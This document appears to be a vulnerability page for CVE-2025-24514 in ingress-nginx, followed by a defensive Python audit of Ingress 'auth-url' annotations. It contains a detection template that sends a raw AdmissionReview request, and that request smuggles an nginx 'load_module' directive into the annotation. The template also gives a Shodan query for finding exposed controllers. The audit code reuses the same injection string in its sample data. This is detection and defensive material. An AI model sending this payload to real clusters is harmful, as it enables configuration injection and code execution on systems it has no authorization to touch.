A security issue was discovered in ingress-nginx (https://github.com/kubernetes/ingress-nginx) where the `auth-url` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
PoC code [publicly available]
id: CVE-2025-24514

info:
  name: Ingress-Nginx Controller - Configuration Injection via Unsanitized `auth-url` Annotation
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A security issue was discovered in ingress-nginx (https://github.com/kubernetes/ingress-nginx) where the `auth-url` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)
  reference:
    - https://github.com/kubernetes/kubernetes/issues/131006
    - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24514
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-24514
    cwe-id: CWE-20
    epss-score: 0.33933
    epss-percentile: 0.96836
  metadata:
    verified: true
    max-request: 1
    shodan-query: ssl:"ingress-nginx" port:8443
  tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "kind": "AdmissionReview",
          "apiVersion": "admission.k8s.io/v1",
          "request": {
            "uid": "d48aa397-c414-4fb2-a2b0-b28187daf8a6",
            "kind": {
              "group": "networking.k8s.io",
              "version": "v1",
              "kind": "Ingress"
            },
            "resource": {
              "group": "networking.k8s.io",
              "version": "v1",
              "resource": "ingresses"
            },
            "requestKind": {
              "group": "networking.k8s.io",
              "version": "v1",
              "kind": "Ingress"
            },
            "requestResource": {
              "group": "networking.k8s.io",
              "version": "v1",
              "resource": "ingresses"
            },
            "name": "test-{{randstr}}",
            "namespace": "default",
            "operation": "CREATE",
            "userInfo": {
            },
            "object": {
              "kind": "Ingress",
              "apiVersion": "networking.k8s.io/v1",
              "metadata": {
                "name": "test-{{randstr}}",
                "namespace": "default",
                "creationTimestamp": null,
                "annotations": {
                  "nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;\n"
                }
              },
              "spec": {
                "ingressClassName": "nginx",
                "rules": [
                  {
                    "host": "{{randstr}}",
                    "http": {
                      "paths": [
                      ]
                    }
                  }
                ]
              },
              "status": {
                "loadBalancer": {}
              }
            },
            "oldObject": null,
            "dryRun": true,
            "options": {
              "kind": "CreateOptions",
              "apiVersion": "meta.k8s.io/v1"
            }
          }
        }

    matchers:
      - type: word
        part: body
        words:
          - 'AdmissionReview'
          - 'directive is not allowed here'
          - 'load_module'
        condition: and
# digest: 4a0a00473045022100ca6e3fb5d65f9687b7d8868e697c59d6cc8b3dbdb6e10b433180dab3c377d38d02206c797e5bce19550f0bda89d7bffd6d37072a6cb72f1759642f9db51ed9de107e:922c64590222798bb761d5b6d8e72950
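The root cause above is that the `auth-url` annotation value reaches the generated nginx.conf without being checked for characters that end or extend an nginx directive (`;`, `#`, `{`, `}`, newlines). The following is an added defensive audit, not code from the ingress-nginx project or from the template's authors: it applies an independent allow-list check (plain `http`/`https` URL with a host and none of those characters) to the `auth-url` annotation of Ingress objects, so that a cluster operator can find Ingress resources whose annotation would be rejected by a strict validator. The `NGINX_BREAKOUT` character set, the sample Ingress objects and the function names are assumptions made for this example; the first sample object reuses the exact annotation value from the PoC request above.

```python
"""Audit Ingress auth-url annotations for nginx directive injection (added example)."""
import re
from urllib.parse import urlsplit

AUTH_URL_ANNOTATION = "nginx.ingress.kubernetes.io/auth-url"

# Characters that can terminate or extend an nginx directive when an
# annotation value is interpolated into the generated nginx.conf.
# Assumption for this example: the set is an allow-list heuristic, not the
# project's own validation rule.
NGINX_BREAKOUT = re.compile(r"[;#{}\s\x00]")


def auth_url_is_safe(value: str) -> bool:
    """Return True only if value is a plain http(s) URL with a host and no nginx-special characters."""
    if NGINX_BREAKOUT.search(value):
        return False
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https"):
        return False
    if not parts.netloc:
        return False
    return True


def audit_ingresses(ingresses):
    """Return (namespace, name, value) for every Ingress whose auth-url annotation fails the check."""
    findings = []
    for ing in ingresses:
        meta = ing.get("metadata", {})
        value = meta.get("annotations", {}).get(AUTH_URL_ANNOTATION)
        if value is None:
            continue  # no external auth configured on this Ingress
        if not auth_url_is_safe(value):
            findings.append((meta.get("namespace", "default"), meta.get("name", ""), value))
    return findings


# Constructed sample objects (not from a real cluster). The first carries the
# injection string used by the PoC request; the second is a benign auth-url;
# the third has no auth-url annotation at all.
SAMPLE_INGRESSES = [
    {"kind": "Ingress", "metadata": {"name": "bad", "namespace": "default",
        "annotations": {AUTH_URL_ANNOTATION: "http://example.com#;load_module test;\n"}}},
    {"kind": "Ingress", "metadata": {"name": "ok", "namespace": "apps",
        "annotations": {AUTH_URL_ANNOTATION: "https://auth.internal.example/validate?strict=1"}}},
    {"kind": "Ingress", "metadata": {"name": "no-auth", "namespace": "apps"}},
]

if __name__ == "__main__":
    for ns, name, value in audit_ingresses(SAMPLE_INGRESSES):
        print(f"{ns}/{name}: unsafe auth-url {value!r}")
```

To run this against a live cluster, replace `SAMPLE_INGRESSES` with the `items` list from `kubectl get ingress -A -o json`. A non-empty result means an annotation value that a strict validator would refuse; on an unpatched controller, the same value is what the admission webhook turns into the "directive is not allowed here" error the template's matchers look for.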